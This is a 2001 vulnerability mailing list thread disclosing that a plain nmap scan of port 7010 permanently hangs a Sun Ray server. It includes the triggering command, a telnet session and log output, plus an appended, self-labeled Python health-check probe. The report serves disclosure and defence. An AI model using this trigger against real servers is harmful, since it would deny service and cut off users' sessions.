Vulnerability Development mailing list archives
RE: Again: Possible DoS attack against Sun Ray Servers?
From: "Chatfield, Randy" <Randy.Chatfield () wipp ws>
Date: Fri, 14 Dec 2001 07:47:04 -0700
Since Sun Rays are designed for private switched networks, this attack should only be possible from an internal network not accessible from the INTERNET. It would be possible for internal network users to launch this type of attack against their Sun Ray server. It would seem that once Sun was notified of this problem, it should be promptly remedied.

Best regards,
Randy Chatfield

-----Original Message-----
From: Hanspeter Schmid [mailto:hps () bernafon ch]
Sent: Thursday, December 13, 2001 11:45 PM
To: 'vuln-dev () securityfocus com'
Subject: Again: Possible DoS attack against Sun Ray Servers?

I have used a patch-reboot cycle to make an experiment. A simple nmap -p 7010 brnray is sufficient to shut down port 7010 of my SunRay server brnray for good. This concerns SunRay server software 1.3 on Solaris 8, with, maybe, almost the latest patches.

Hanspi

P.S. A small protocol. I worked on brnfire; brnray is the SunRay server

brnfire> telnet brnray 7010
status
[[[output O.K.]]]
brnfire> nmap -p 7010 brnray

--- log entries
Dec 14 07:21:09 brnfire sudo: [ID 850335 local2.notice] hps : TTY=pts/16 ; PWD=/home/hps ; USER=root ; COMMAND=/usr/sepp/bin/nmap -p 7010 brnray
Dec 14 07:21:09 brnray utauthd: [ID 250799 user.info] CallBack0 UNEXPECTED: Cannot accept on socket: java.net.SocketException: Software caused connection abort
----

brnfire> telnet brnray 7010
[[[session hangs]]]
[[[From this point on, users cannot log in anymore, and users that are already logged in may lose their sessions.]]]
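Added example, not part of either message above and not Sun's code: a monitoring probe that repeats the "status" check from the P.S. and tells apart a port that answers, one that connects but stays silent, and one that cannot be reached. The function names, the timeout and the local stand-in listeners are assumptions; the only protocol detail used is the "status" line typed in the telnet session.

```python
import socket
import threading

def probe_status_port(host, port=7010, timeout=5.0):
    """Classify the status port as 'ok', 'hang' or 'down'."""
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return "down"   # refused, unreachable, or connect timed out
    with sock:
        try:
            sock.sendall(b"status\r\n")   # same line the telnet session sends
            data = sock.recv(4096)
        except socket.timeout:
            return "hang"   # TCP connect worked, nothing came back in time
        except OSError:
            return "down"   # connection reset mid-exchange
    return "ok" if data else "down"   # empty read: peer closed without output

def constructed_listener(answer):
    """Constructed local stand-in: answers once if answer is True, else never accepts."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    if answer:
        def serve():
            conn, _ = srv.accept()
            with conn:
                conn.recv(64)
                conn.sendall(b"constructed status output\n")
        threading.Thread(target=serve, daemon=True).start()
    return srv

if __name__ == "__main__":
    for label, answer in (("answering", True), ("hung", False)):
        srv = constructed_listener(answer)
        port = srv.getsockname()[1]
        print(label, probe_status_port("127.0.0.1", port, timeout=1.0))
        srv.close()
```

Run from a host that is allowed to reach the server, a "hang" or "down" result alongside the utauthd "Cannot accept on socket" log entry is the condition to alert on.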